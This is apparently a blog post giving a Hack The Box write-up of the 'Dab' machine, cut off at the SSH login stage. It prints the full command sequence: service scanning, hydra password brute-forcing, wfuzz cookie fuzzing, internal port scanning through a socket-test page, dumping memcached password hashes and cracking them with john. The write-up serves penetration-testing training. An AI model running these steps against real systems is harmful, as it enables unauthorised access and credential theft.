{"id":1136,"date":"2019-02-02T17:15:33","date_gmt":"2019-02-02T17:15:33","guid":{"rendered":"https:\/\/devel0pment.de\/?p=1136"},"modified":"2019-02-02T17:15:51","modified_gmt":"2019-02-02T17:15:51","slug":"hack-the-box-dab","status":"publish","type":"post","link":"https:\/\/devel0pment.de\/?p=1136","title":{"rendered":"Hack The Box – Dab"},"content":{"rendered":"

\"\"<\/p>\n

This article contains my first writeup on a machine from Hack The Box<\/a>. If you have not checked out Hack The Box<\/i> yet, I really suggest you do. Aside from providing classical CTF-style challenges, the plattform hosts plenty of vulnerable machines (boxes<\/i>), which are supposed to be exploited. The boxes tend to be geared to realistic scenarios and are thus an awesome opportunity to increase your own pen testing skills.<\/p>\n

In order to prove the exploitation of a machine, there are two different flag files stored on each machine. The first one to acquire is a file called user.txt<\/code>, which can be read by a low privileged user. The next step after initially exploiting the machine is to escalate privileges gaining access to an administrative user (root access). With this high privileged user a second file called root.txt<\/code> can be read. Both files contain a flag (an md5sum), which is supposed to be submitted on the Hack The Box<\/i> website rewarding you with the corresponding points for this machine.<\/p>\n

\"\"<\/p>\n

According to those two steps\/files the article is divided into the following sections:<\/p>\n

\u2192 User<\/a>
    – Port Scan<\/a>
    – FTP (Port 21)<\/a>
    – SSH (Port 22)<\/a>
    – HTTP nginx (Port 80)<\/a>
    – HTTP nginx (Port 8080)<\/a>
    – Back to SSH<\/a><\/p>\n

\u2192 Root<\/a>
    – Initial Enumeration<\/a>
    – SUID binaries<\/a>
    – myexec<\/a>
    – libseclogin.so<\/a>
    – myexec’s password<\/a>
    – ldconfig<\/a>
    – Compile own shared Library<\/a><\/p>\n

<\/p>\n

<\/p>\n

\n

User<\/h2>\n

Port Scan<\/h3>\n

In order to get a quick overview of the most common opened ports we can run nmap -sV -sC 10.10.10.86<\/code>. The option -sV<\/code> enables the version detection of available services (eg. by evaluating the service’s banner). -sC<\/code> makes nmap run all default scripts for the available services:<\/p>\n\n

\nroot@kali:~\/Documents\/htb\/boxes\/dab# nmap -sV -sC 10.10.10.86\nStarting Nmap 7.70 ( https:\/\/nmap.org ) at 2019-01-12 06:38 EST\nNmap scan report for 10.10.10.86\nHost is up (0.072s latency).\nNot shown: 996 closed ports\nPORT     STATE SERVICE VERSION\n21\/tcp   open  ftp     vsftpd 3.0.3\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n|_-rw-r--r--    1 0        0            8803 Mar 26  2018 dab.jpg\n| ftp-syst:\n|   STAT:\n| FTP server status:\n|      Connected to ::ffff:10.10.13.93\n|      Logged in as ftp\n|      TYPE: ASCII\n|      No session bandwidth limit\n|      Session timeout in seconds is 300\n|      Control connection is plain text\n|      Data connections will be plain text\n|      At session startup, client count was 4\n|      vsFTPd 3.0.3 - secure, fast, stable\n|_End of status\n22\/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey:\n|   2048 20:05:77:1e:73:66:bb:1e:7d:46:0f:65:50:2c:f9:0e (RSA)\n|   256 61:ae:15:23:fc:bc:bc:29:13:06:f2:10:e0:0e:da:a0 (ECDSA)\n|_  256 2d:35:96:4c:5e:dd:5c:c0:63:f0:dc:86:f1:b1:76:b5 (ED25519)\n80\/tcp   open  http    nginx 1.10.3 (Ubuntu)\n|_http-server-header: nginx\/1.10.3 (Ubuntu)\n| http-title: Login\n|_Requested resource was http:\/\/10.10.10.86\/login\n8080\/tcp open  http    nginx 1.10.3 (Ubuntu)\n|_http-open-proxy: Proxy might be redirecting requests\n|_http-server-header: nginx\/1.10.3 (Ubuntu)\n|_http-title: Internal Dev\nService Info: OSs: Unix, Linux; CPE: cpe:\/o:linux:linux_kernel\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 9.58 seconds\n\n<\/pre><\/div>\n\n
Since nmap only scans the 1000 most common ports by default, we should also run nmap 10.10.10.86 -p-<\/code> to scan all 65535 ports. In this case this does not reveal any other open ports:<\/p>\n\n
\nroot@kali:~\/Documents\/htb\/boxes\/dab# nmap 10.10.10.86 -p-\nStarting Nmap 7.70 ( https:\/\/nmap.org ) at 2019-01-12 06:47 EST\nNmap scan report for 10.10.10.86\nHost is up (0.040s latency).\nNot shown: 65531 closed ports\nPORT     STATE SERVICE\n21\/tcp   open  ftp\n22\/tcp   open  ssh\n80\/tcp   open  http\n8080\/tcp open  http-proxy\n\nNmap done: 1 IP address (1 host up) scanned in 52.29 seconds\n\n<\/pre><\/div>\n\n
The output of the first scan above contains detailed information on 4 running services on port 21<\/code>, 22<\/code>, 80<\/code> and 8080<\/code>. Let’s have a closer look at each of those services.<\/p>\n
FTP (Port 21)<\/h3>\n
According to the nmap output, there is a vsftpd 3.0.3<\/code> listening on port 21:<\/p>\n\n
\n21\/tcp   open  ftp     vsftpd 3.0.3\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n|_-rw-r--r--    1 0        0            8803 Mar 26  2018 dab.jpg\n| ftp-syst:\n|   STAT:\n| FTP server status:\n|      Connected to ::ffff:10.10.13.93\n|      Logged in as ftp\n|      TYPE: ASCII\n|      No session bandwidth limit\n|      Session timeout in seconds is 300\n|      Control connection is plain text\n|      Data connections will be plain text\n|      At session startup, client count was 4\n|      vsFTPd 3.0.3 - secure, fast, stable\n|_End of status\n\n<\/pre><\/div>\n\n
Since we ran nmap with default scripts enabled (-sC<\/code>), it also tried to login anonymously. Obviously this was successful and the output lists a file called dab.jpg<\/code>. We can confirm this by using ftp<\/code>:<\/p>\n\n
\nroot@kali:~\/Documents\/htb\/boxes\/dab# ftp 10.10.10.86\nConnected to 10.10.10.86.\n220 (vsFTPd 3.0.3)\nName (10.10.10.86:root): anonymous\n331 Please specify the password.\nPassword:\n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp> dir -a\n200 PORT command successful. Consider using PASV.\n150 Here comes the directory listing.\ndrwxr-xr-x    2 0        120          4096 Mar 26  2018 .\ndrwxr-xr-x    2 0        120          4096 Mar 26  2018 ..\n-rw-r--r--    1 0        0            8803 Mar 26  2018 dab.jpg\n226 Directory send OK.\n\n<\/pre><\/div>\n\n
For the password simply hit ENTER<\/code>. We can download the file using the command get dab.jpg<\/code>:<\/p>\n\n
\nftp> get dab.jpg\nlocal: dab.jpg remote: dab.jpg\n200 PORT command successful. Consider using PASV.\n150 Opening BINARY mode data connection for dab.jpg (8803 bytes).\n226 Transfer complete.\n8803 bytes received in 0.00 secs (239.8627 MB\/s)\nftp> \n\n<\/pre><\/div>\n\n
The image itself does not seem to reveal any useful information:<\/p>\n
\"\"<\/p>\n
Also the metadata, which we can inspect using exiftool<\/code>, do not seem to contain something useful:<\/p>\n\n
\nroot@kali:~\/Documents\/htb\/boxes\/dab# exiftool dab.jpg \nExifTool Version Number         : 11.16\nFile Name                       : dab.jpg\nDirectory                       : .\nFile Size                       : 8.6 kB\nFile Modification Date\/Time     : 2019:01:14 08:53:28-05:00\nFile Access Date\/Time           : 2019:01:14 08:53:28-05:00\nFile Inode Change Date\/Time     : 2019:01:14 08:53:28-05:00\nFile Permissions                : rw-r--r--\nFile Type                       : JPEG\nFile Type Extension             : jpg\nMIME Type                       : image\/jpeg\nJFIF Version                    : 1.01\nResolution Unit                 : inches\nX Resolution                    : 96\nY Resolution                    : 96\nImage Width                     : 151\nImage Height                    : 132\nEncoding Process                : Baseline DCT, Huffman coding\nBits Per Sample                 : 8\nColor Components                : 3\nY Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)\nImage Size                      : 151x132\nMegapixels                      : 0.020\n\n<\/pre><\/div>\n\n
A common quick win to reveal hidden<\/i> information in a file is to use strings<\/code> or binwalk<\/code>. Though in this case, there is nothing interesting here:<\/p>\n\n
\nroot@kali:~\/Documents\/htb\/boxes\/dab# strings dab.jpg \nJFIF\n$3br\n%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz\n\t#3R\n&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz\nU,Za+M\n@gyX\ngztU\n~QEjE\nNBPt\n...\n\n<\/pre><\/div>\n\n
\nroot@kali:~\/Documents\/htb\/boxes\/dab# binwalk dab.jpg \n\nDECIMAL       HEXADECIMAL     DESCRIPTION\n--------------------------------------------------------------------------------\n0             0x0             JPEG image data, JFIF standard 1.01\n\n\n<\/pre><\/div>\n\n
As a next step we could try steganography tools like steghide<\/code> or stegoVeritas<\/code>. Since there are more services to look at, we proceed with those first.<\/p>\n
SSH (Port 22)<\/h3>\n
According to the nmap output, the server is running OpenSSH 7.2p2<\/code>:<\/p>\n\n
\n22\/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey:\n|   2048 20:05:77:1e:73:66:bb:1e:7d:46:0f:65:50:2c:f9:0e (RSA)\n|   256 61:ae:15:23:fc:bc:bc:29:13:06:f2:10:e0:0e:da:a0 (ECDSA)\n|_  256 2d:35:96:4c:5e:dd:5c:c0:63:f0:dc:86:f1:b1:76:b5 (ED25519)\n\n<\/pre><\/div>\n\n
This version is vulnerable to CVE-2018-15473<\/a>, which can be used to determine if a given username exists or not. This can for example be done using this script<\/a>:<\/p>\n\n
\nroot@kali:\/opt\/ssh-user-enum# .\/ssh-check-username.py 10.10.10.86 root\n[+] Valid username\nroot@kali:\/opt\/ssh-user-enum# .\/ssh-check-username.py 10.10.10.86 www-data\n[+] Valid username\nroot@kali:\/opt\/ssh-user-enum# .\/ssh-check-username.py 10.10.10.86 ftp\n[+] Valid username\nroot@kali:\/opt\/ssh-user-enum# .\/ssh-check-username.py 10.10.10.86 dab\n[*] Invalid username\nroot@kali:\/opt\/ssh-user-enum# .\/ssh-check-username.py 10.10.10.86 user\n[*] Invalid username\n\n<\/pre><\/div>\n\n
Despite of verifying some common usernames this does not gives us a great advantage for now. So let’s proceed with the next service.<\/p>\n
HTTP nginx (Port 80)<\/h3>\n
On port 80 a nginx webserver is listening:<\/p>\n\n
\n80\/tcp   open  http    nginx 1.10.3 (Ubuntu)\n|_http-server-header: nginx\/1.10.3 (Ubuntu)\n| http-title: Login\n|_Requested resource was http:\/\/10.10.10.86\/login\n\n<\/pre><\/div>\n\n
Accessing the website, we are redirected to a login page at \/login<\/code>:<\/p>\n
\"\"<\/p>\n
Using default credentials (admin<\/code> \/ admin<\/code>) displays the error message Error: Login failed<\/code>:<\/p>\n
\"\"<\/p>\n
In order to find a valid login we can use hydra<\/code> using a password wordlist from SecLists<\/a>:<\/p>\n\n
\nroot@kali:~\/Documents\/htb\/boxes\/dab# hydra 10.10.10.86 -l admin -P \/usr\/share\/wordlists\/SecLists\/Passwords\/probable-v2-top12000.txt http-post-form "\/login:username=^USER^&password=^PASS^:Login failed"\nHydra v8.6 (c) 2017 by van Hauser\/THC - Please do not use in military or secret service organizations, or for illegal purposes.\n\nHydra (http:\/\/www.thc.org\/thc-hydra) starting at 2019-01-15 01:01:49\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 12645 login tries (l:1\/p:12645), ~791 tries per task\n[DATA] attacking http-post-form:\/\/10.10.10.86:80\/\/login:username=^USER^&password=^PASS^:Login failed\n[80][http-post-form] host: 10.10.10.86   login: admin   password: Password1\n1 of 1 target successfully completed, 1 valid password found\nHydra (http:\/\/www.thc.org\/thc-hydra) finished at 2019-01-15 01:02:32\n\n<\/pre><\/div>\n\n
A quick explaination of the used options:<\/p>\n\n\n\n\n\n\n\n
Option<\/td>\nDescription<\/td>\n<\/tr>\n
-l admin<\/code><\/td>\nFor every login attempt use the username “admin”.<\/td>\n<\/tr>\n
-P \/usr\/share\/wordlists\/...<\/code><\/td>\nFor the password use words from the given wordlist.<\/td>\n<\/tr>\n
http-post-form<\/code><\/td>\nThe request method is POST.<\/td>\n<\/tr>\n
\"\/login:username=^USER^&password=^PASS^:Login failed\"\"<\/code><\/td>\nThe request URL is \/login<\/code>. The POST parameters are username<\/code> and password<\/code>, which are set by hydra. A failed login attempt can be identified by the string “Login failed”<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
With the credentials revealed by hydra (admin<\/code> \/ Password1<\/code>) we can login to the page, which simply lists a bunch of stock items:<\/p>\n
\"\"<\/p>\n
Aside of a debug comment in the sourcecode stating that the data tables were loaded from MySQL, there is nothing really noticeable:<\/p>\n\n
\n<html>\n  <head>\n    <title>Items in stock<\/title>\n    <meta name="viewport" content="width=device-width, initial-scale=1.0">\n  <\/head>\n  <body>\n    <div class="container">\n      <h2>Welcome admin<\/h2>\n      <a href="\/logout">Logout<\/a>\n      \n      <h3>Items in stock (database updated every few hours)<\/h3>\n      <!-- Debug... data tables were loaded from : MySQL DB -->\n      <table>\n      <thead>\n      <th>\n        <tr>\n          <th>Item<\/th>\n          <th>Qty<\/th>\n        <\/tr>\n       <\/th>\n       <\/thead>\n       <tbody>\n\n<\/pre><\/div>\n\n
When we reload the page, the ordering of the stock items changes and the comment in the sourcecode now states Debug... data tables were loaded from : Cache<\/code>:<\/p>\n\n
\n<html>\n  <head>\n    <title>Items in stock<\/title>\n    <meta name="viewport" content="width=device-width, initial-scale=1.0">\n  <\/head>\n  <body>\n    <div class="container">\n      <h2>Welcome admin<\/h2>\n      <a href="\/logout">Logout<\/a>\n      \n      <h3>Items in stock (database updated every few hours)<\/h3>\n      <!-- Debug... data tables were loaded from : Cache -->\n      <table>\n\n<\/pre><\/div>\n\n
Since there does not seem to be any other functionalities, let’s keep the sightings in mind and proceed with the next service.<\/p>\n
HTTP nginx (Port 8080)<\/h3>\n
There is another nginx webserver listening on port 8080:<\/p>\n\n
\n8080\/tcp open  http    nginx 1.10.3 (Ubuntu)\n|_http-open-proxy: Proxy might be redirecting requests\n|_http-server-header: nginx\/1.10.3 (Ubuntu)\n|_http-title: Internal Dev\n\n<\/pre><\/div>\n\n
The website’s title is called Internal Dev<\/code> displaying the error message Access denied: password authentication cookie not set<\/code>:<\/p>\n
\"\"<\/p>\n
Obviously we need to set an authentication cookie to access the page. Since we do not know the name of the cookie, we can use wfuzz<\/code> to try different cookies and observe the server’s response:<\/p>\n\n
\nroot@kali:~\/Documents\/htb\/boxes\/dab# wfuzz -w \/usr\/share\/wordlists\/SecLists\/Discovery\/Web-Content\/burp-parameter-names.txt -b 'FUZZ=1' http:\/\/10.10.10.86:8080\n\nWarning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.\n\n********************************************************\n* Wfuzz 2.3 - The Web Fuzzer                           *\n********************************************************\n\nTarget: http:\/\/10.10.10.86:8080\/\nTotal requests: 2588\n\n==================================================================\nID   Response   Lines      Word         Chars          Payload    \n==================================================================\n\n000001:  C=200     14 L\t      30 W\t    322 Ch\t  "id"\n000002:  C=200     14 L\t      30 W\t    322 Ch\t  "action"\n000003:  C=200     14 L\t      30 W\t    322 Ch\t  "page"\n000004:  C=200     14 L\t      30 W\t    322 Ch\t  "name"\n000005:  C=200     14 L\t      29 W\t    324 Ch\t  "password"\n000006:  C=200     14 L\t      30 W\t    322 Ch\t  "url"\n000007:  C=200     14 L\t      30 W\t    322 Ch\t  "email"\n000008:  C=200     14 L\t      30 W\t    322 Ch\t  "type"\n000009:  C=200     14 L\t      30 W\t    322 Ch\t  "username"\n000010:  C=200     14 L\t      30 W\t    322 Ch\t  "file"\n000011:  C=200     14 L\t      30 W\t    322 Ch\t  "title"\n000012:  C=200     14 L\t      30 W\t    322 Ch\t  "code"\n...\n\n<\/pre><\/div>\n\n
A quick explaination of the used options:<\/p>\n\n\n\n\n\n\n
Option<\/td>\nDescription<\/td>\n<\/tr>\n
-w \/usr\/share\/wordlists\/...<\/code><\/td>\nThe wordlist to use for fuzzing (this this case burp-parameter-names.txt<\/code>).<\/td>\n<\/tr>\n
-b 'FUZZ=1'<\/code><\/td>\nSet a cookie in the request. For the name use the fuzz input from the given wordlist.<\/td>\n<\/tr>\n
http:\/\/10.10.10.86:8080<\/code><\/td>\nThe URL to fuzz.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
Within every line wfuzz reports how the server responded for a specific payload (cookie name) displaying the status code (e.g. C=200<\/code>), the line count (e.g. 14 L<\/code>), the word count (e.g. 30 W<\/code>) and the character count (e.g. 322 Ch<\/code>). Intently examining the first lines of output we can already see, that the response for the payload password<\/code> differs from the others (29 W, 324 Ch<\/code>). In order to make different responses like this stick out, we can set a filter. By providing the option --hh 322<\/code> we can for example hide responses, which contain exactely 322 characters:<\/p>\n\n
\nroot@kali:~\/Documents\/htb\/boxes\/dab# wfuzz --hh 322 -w \/usr\/share\/wordlists\/SecLists\/Discovery\/Web-Content\/burp-parameter-names.txt -b 'FUZZ=1' http:\/\/10.10.10.86:8080\n\nWarning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.\n\n********************************************************\n* Wfuzz 2.3 - The Web Fuzzer                           *\n********************************************************\n\nTarget: http:\/\/10.10.10.86:8080\/\nTotal requests: 2588\n\n==================================================================\nID   Response   Lines      Word         Chars          Payload    \n==================================================================\n\n000005:  C=200     14 L\t      29 W\t    324 Ch\t  "password"\n\nTotal time: 7.577409\nProcessed Requests: 2588\nFiltered Requests: 2587\nRequests\/sec.: 341.5415\n\n<\/pre><\/div>\n\n
Using the filter we can see at a glance that the payload password<\/code> differs from the others. Now we can make a request setting a cookie named password<\/code> and see what the response actually contains:<\/p>\n\n
\nroot@kali:~\/Documents\/htb\/boxes\/dab# curl http:\/\/10.10.10.86:8080 --cookie "password=1"\n<!DOCTYPE html>\n<html lang="en">\n<head>\n<title>Internal Dev<\/title>\n\t<meta charset="UTF-8">\n\t<meta name="viewport" content="initial-scale=1, maximum-scale=1, user-scalable=no, width=device-width">\n<\/head>\n<body>\n<div class="container wrapper">\n\nAccess denied: password authentication cookie incorrect\n\n<\/div>\n<\/body>\n<\/html>\n\n<\/pre><\/div>\n\n
There is another error message: Access denied: password authentication cookie incorrect<\/code>. This means that the name of the cookie (password<\/code>) is correct, but the value (we simply supplied 1 here) is not correct. Again we can use wfuzz<\/code> to fuzz the actual value. This time we hide responses containing 324 characters:<\/p>\n\n
\nroot@kali:~\/Documents\/htb\/boxes\/dab# wfuzz --hh 324 -w \/usr\/share\/wordlists\/SecLists\/Discovery\/Web-Content\/burp-parameter-names.txt -b 'password=FUZZ' http:\/\/10.10.10.86:8080\n\nWarning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.\n\n********************************************************\n* Wfuzz 2.3 - The Web Fuzzer                           *\n********************************************************\n\nTarget: http:\/\/10.10.10.86:8080\/\nTotal requests: 2588\n\n==================================================================\nID   Response   Lines      Word         Chars          Payload    \n==================================================================\n\n000190:  C=200     21 L\t      48 W\t    540 Ch\t  "secret"\n\nTotal time: 7.729689\nProcessed Requests: 2588\nFiltered Requests: 2587\nRequests\/sec.: 334.8129\n\n<\/pre><\/div>\n\n
Yet again, there is a reponse sticking out. This time for the payload secret<\/code>. Let’s make the corresponding request and inspect the response’s content:<\/p>\n\n
\nroot@kali:~\/Documents\/htb\/boxes\/dab# curl http:\/\/10.10.10.86:8080 --cookie "password=secret"\n<!DOCTYPE html>\n<html lang="en">\n<head>\n<title>Internal Dev<\/title>\n\t<meta charset="UTF-8">\n\t<meta name="viewport" content="initial-scale=1, maximum-scale=1, user-scalable=no, width=device-width">\n<\/head>\n<body>\n<div class="container wrapper">\n\n<p>Status of cache engine: Online<\/p>\n<h4>TCP socket test<\/h4>\n<form action="\/socket">\n<input type="text" name="port" placeholder="TCP port"><\/input>\n<input type="text" name="cmd" placeholder="Line to send..."><\/input>\n<input type="submit" value="Submit"<\/input>\n<\/form>\n\n\n<\/div>\n<\/body>\n<\/html>\n\n<\/pre><\/div>\n\n
The page contains a TCP socket test<\/code> with a form fields TCP port<\/code> and Line to send...<\/code>. By setting the cookie within our browser (e.g. using Cookie Manager) we can view the rendered page:<\/p>\n
\"\"<\/p>\n
\"\"<\/p>\n
After having tried different ports and comparing the output with our nmap scan, we can be quite sure that the page is making connections to the server itself:<\/p>\n\n
\nroot@kali:~\/Documents\/htb\/boxes\/dab# curl 'http:\/\/10.10.10.86:8080\/socket?port=21&cmd=a' --cookie "password=secret"\n...\n<p>Output<\/p>\n<pre>\n220 (vsFTPd 3.0.3)\n530 Please login with USER and PASS.\n\nroot@kali:~\/Documents\/htb\/boxes\/dab# curl 'http:\/\/10.10.10.86:8080\/socket?port=22&cmd=a' --cookie "password=secret"\n...\n<p>Output<\/p>\n<pre>\nSSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.4\nProtocol mismatch.\n\nroot@kali:~\/Documents\/htb\/boxes\/dab# curl 'http:\/\/10.10.10.86:8080\/socket?port=80&cmd=a' --cookie "password=secret"\n...\n<p>Output<\/p>\n<pre>\nHTTP\/1.1 400 Bad Request\nServer: nginx\/1.10.3 (Ubuntu)\nDate: Tue, 15 Jan 2019 07:04:51 GMT\nContent-Type: text\/html\nContent-Length: 182\nConnection: close\n\n<\/pre><\/div>\n\n
So what can we use this for? We also reached the ports above (21, 22, 80) from our own machine. Truly interesting are ports, which cannot be reached from our own machine, because there are listing on localhost. Those ports can be accessed through the webpage, because the page is running on the server itself.<\/p>\n
If we try to access a port, which is not open, the server responses with 500 Internal Server Error<\/code>. So we can create a bash-loop to internally scan for open ports:<\/p>\n\n
\nroot@kali:~\/Documents\/htb\/boxes\/dab# for i in `seq 1 20000`; do echo "port=$i"; curl 'http:\/\/10.10.10.86:8080\/socket?port='$i'&cmd=test' --cookie 'password=secret' 2>\/dev\/null | tr -d '\\n' | grep -v '500 Internal Server Error' ;done > internalports.txt\n\n<\/pre><\/div>\n\n
This loop scans the first 20000 ports and really takes some time. Actually we already stumbled upon some hints, which port we should look for. Within the sourcecode of the website on port 80, we saw a debug comment stating that the data was loaded from MySQL. Also the TCP socket test<\/code> website on port 8080 displays the message Status of cache engine: Online<\/code>. This should lead us to memcached<\/a>, which is by default listing on port 11211. After our internal port scan loop reaches this port, it actually verifies that there is something listening on port 11211:<\/p>\n\n
\nroot@kali:~\/Documents\/htb\/boxes\/dab# cat internalports.txt | grep -v 'port=' -B1 \nport=21\n<!DOCTYPE html><html lang="en"><head><title>Internal Dev<\/title>\t<meta charset="UTF-8">\t<meta name="viewport" content="initial-scale=1, maximum-scale=1, user-scalable=no, width=device-width"><\/head><body><div class="container wrapper"><p>Status of cache engine: Online<\/p><h4>TCP socket test<\/h4><form action="\/socket"><input type="text" name="port" placeholder="TCP port"><\/input><input type="text" name="cmd" placeholder="Line to send..."><\/i<\/pre><\/div><\/body><\/html> and PASS.mit"<\/input><\/form><p>Output<\/p><pre>220 (vsFTPd 3.0.3)\nport=22\n<!DOCTYPE html><html lang="en"><head><title>Internal Dev<\/title>\t<meta charset="UTF-8">\t<meta name="viewport" content="initial-scale=1, maximum-scale=1, user-scalable=no, width=device-width"><\/head><body><div class="container wrapper"><p>Status of cache engine: Online<\/p><h4>TCP socket test<\/h4><form action="\/socket"><input type="text" name="port" placeholder="TCP port"><\/input><input type="text" name="cmd" placeholder="Line to send..."><\/iProtocol mismatch.<\/pre><\/div><\/body><\/html>put><\/form><p>Output<\/p><pre>SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.4\n--\nport=80\n<!DOCTYPE html><html lang="en"><head><title>Internal Dev<\/title>\t<meta charset="UTF-8">\t<meta name="viewport" content="initial-scale=1, maximum-scale=1, user-scalable=no, width=device-width"><\/head><body><div class="container wrapper"><p>Status of cache engine: Online<\/p><h4>TCP socket test<\/h4><form action="\/socket"><input type="text" name="port" placeholder="TCP port"><\/input><input type="text" name="cmd" placeholder="Line to send..."><\/i<\/pre><\/div><\/body><\/html>inx\/1.10.3 (Ubuntu)<\/center>r>t;><pre>HTTP\/1.1 400 Bad Request\n--\nport=8080\n<!DOCTYPE html><html lang="en"><head><title>Internal Dev<\/title>\t<meta charset="UTF-8">\t<meta name="viewport" content="initial-scale=1, maximum-scale=1, user-scalable=no, width=device-width"><\/head><body><div class="container wrapper"><p>Status of cache engine: Online<\/p><h4>TCP socket test<\/h4><form action="\/socket"><input type="text" name="port" placeholder="TCP port"><\/input><input type="text" name="cmd" placeholder="Line to send..."><\/i<\/pre><\/div><\/body><\/html>inx\/1.10.3 (Ubuntu)<\/center>r>t;><pre>HTTP\/1.1 400 Bad Request\n--\nport=11211\n<!DOCTYPE html><html lang="en"><head><title>Internal Dev<\/title>\t<meta charset="UTF-8">\t<meta name="viewport" content="initial-scale=1, maximum-scale=1, user-scalable=no, width=device-width"><\/head><body><div class="container wrapper"><p>Status of cache engine: Online<\/p><h4>TCP socket test<\/h4><form action="\/socket"><input type="text" name="port" placeholder="TCP port"><\/input><input type="text" name="cmd" placeholder="Line to send..."><\/i<\/pre><\/div><\/body><\/html>value="Submit"<\/input><\/form><p>Output<\/p><pre>ERROR\n\n<\/pre><\/div>\n\n
memcached<\/i> is a key-value based cache, which purpose is to hold data from a database like MySQL in the RAM to make it available more quickly. With a little bit of research<\/a> the required commands to display all keys can be found.<\/p>\n
At first we use the command stats items<\/code> to list the slab ids:<\/p>\n\n
\nroot@kali:~\/Documents\/htb\/boxes\/dab# curl 'http:\/\/10.10.10.86:8080\/socket?port=11211&cmd=stats%20items' --cookie "password=secret"\n...\n<p>Output<\/p>\n<pre>\nSTAT items:16:number 1\nSTAT items:16:age 833\nSTAT items:16:evicted 0\nSTAT items:16:evicted_nonzero 0\nSTAT items:16:evicted_time 0\nSTAT items:16:outofmemory 0\nSTAT items:16:tailrepairs 0\nSTAT items:16:reclaimed 0\nSTAT items:16:expired_unfetched 0\nSTAT items:16:evicted_unfetched 0\nSTAT items:16:crawler_reclaimed 0\nSTAT items:16:crawler_items_checked 0\nSTAT items:16:lrutail_reflocked 0\nSTAT items:26:number 1\nSTAT items:26:age 833\nSTAT items:26:evicted 0\nSTAT items:26:evicted_nonzero 0\nSTAT items:26:evicted_time 0\nSTAT items:26:outofmemory 0\nSTAT items:26:tailrepairs 0\nSTAT items:26:reclaimed 0\nSTAT items:26:expired_unfetched 0\nSTAT items:26:evicted_unfetched 0\nSTAT items:26:crawler_reclaimed 0\nSTAT items:26:crawler_items_checked 0\nSTAT items:26:lrutail_reflocked 0\nEND\n\n<\/pre><\/div>\n\n
With the slab ids we can dump the actual keys using the command stats cachedump <slabid> <limit><\/code>:<\/p>\n\n
\nroot@kali:~\/Documents\/htb\/boxes\/dab# curl 'http:\/\/10.10.10.86:8080\/socket?port=11211&cmd=stats%20cachedump%2026%20100' --cookie "password=secret"\n...\n<p>Output<\/p>\n<pre>\nITEM users [24625 b; 1547538384 s]\nEND\n\n<\/pre><\/div>\n\n
There is a key users<\/code> which we can dump using the command get users<\/code>:<\/p>\n\n
\nroot@kali:~\/Documents\/htb\/boxes\/dab# curl 'http:\/\/10.10.10.86:8080\/socket?port=11211&cmd=get%20users' --cookie "password=secret"\n...\n<p>Output<\/p>\n<pre>\nVALUE users 0 24625\n{"quinton_dach": "17906b445a05dc42f78ae86a92a57bbd", "jackie.abbott": "c6ab361604c4691f78958d6289910d21", ...\n\n<\/pre><\/div>\n\n
Great! We obviously got plenty of usernames and hashed passwords. Please notice that you had to be logged in on the stock item website on port 80 recently for the cache to actually contain data.<\/p>\n
We can simply pipe the output to a file and adjust the formatting a little bit (replace html-encoding, add new lines, …):<\/p>\n\n
\nroot@kali:~\/Documents\/htb\/boxes\/dab# cat users2.txt | head\nquinton_dach:17906b445a05dc42f78ae86a92a57bbd\njackie.abbott:c6ab361604c4691f78958d6289910d21\nisidro:e4a4c90483d2ef61de42af1f044087f3\nroy:afbde995441e19497fe0695e9c539266\ncolleen:d3792794c3143f7e04fd57dc8b085cd4\nharrison.hessel:bc5f9b43a0336253ff947a4f8dbdb74f\nasa.christiansen:d7505316e9a10fc113126f808663b5a4\njessie:71f08b45555acc5259bcefa3af63f4e1\nmilton_hintz:8f61be2ebfc66a5f2496bbf849c89b84\ndemario_homenick:2c22da161f085a9aba62b9bbedbd4ca7\n\n<\/pre><\/div>\n\n
The hash-values seem to be md5. We can verify this by using the password for the username admin<\/code>, which we already revealed using hydra:<\/p>\n\n
\nroot@kali:~\/Documents\/htb\/boxes\/dab# echo -n "Password1" | md5sum\n2ac9cb7dc02b3c0083eb70898e549b63  -\nroot@kali:~\/Documents\/htb\/boxes\/dab# cat users2.txt | grep admin\nadmin:2ac9cb7dc02b3c0083eb70898e549b63\n\n<\/pre><\/div>\n\n
That is a match. Let’s run john<\/code> on the file to crack more passwords:<\/p>\n\n
\nroot@kali:~\/Documents\/htb\/boxes\/dab# john users2.txt --format=Raw-MD5\nCreated directory: \/root\/.john\nUsing default input encoding: UTF-8\nLoaded 495 password hashes with no different salts (Raw-MD5 [MD5 128\/128 AVX 4x3])\nPress 'q' or Ctrl-C to abort, almost any other key for status\ndefault          (default)\ndemo             (demo)\nPrincess1        (genevieve)\nPassword1        (admin)\npiggy            (abbigail)\nblaster          (alec)\nmegadeth         (wendell)\nmisfits          (aglae)\nmonkeyman        (ona)\n...\n\n<\/pre><\/div>\n\n
After letting john run for a while, we can output the cracked credentials to a file:<\/p>\n\n
\nroot@kali:~\/Documents\/htb\/boxes\/dab# john users2.txt --format=Raw-MD5 --show > users_cracked.txt\n\n<\/pre><\/div>\n\n
Back to SSH<\/h3>\n
Now we can try to access SSH with those credentials. Again we can use hydra<\/code> for this supplying the file with the username:password<\/code> combination (delete the last two lines from the john output beforehand):<\/p>\n\n
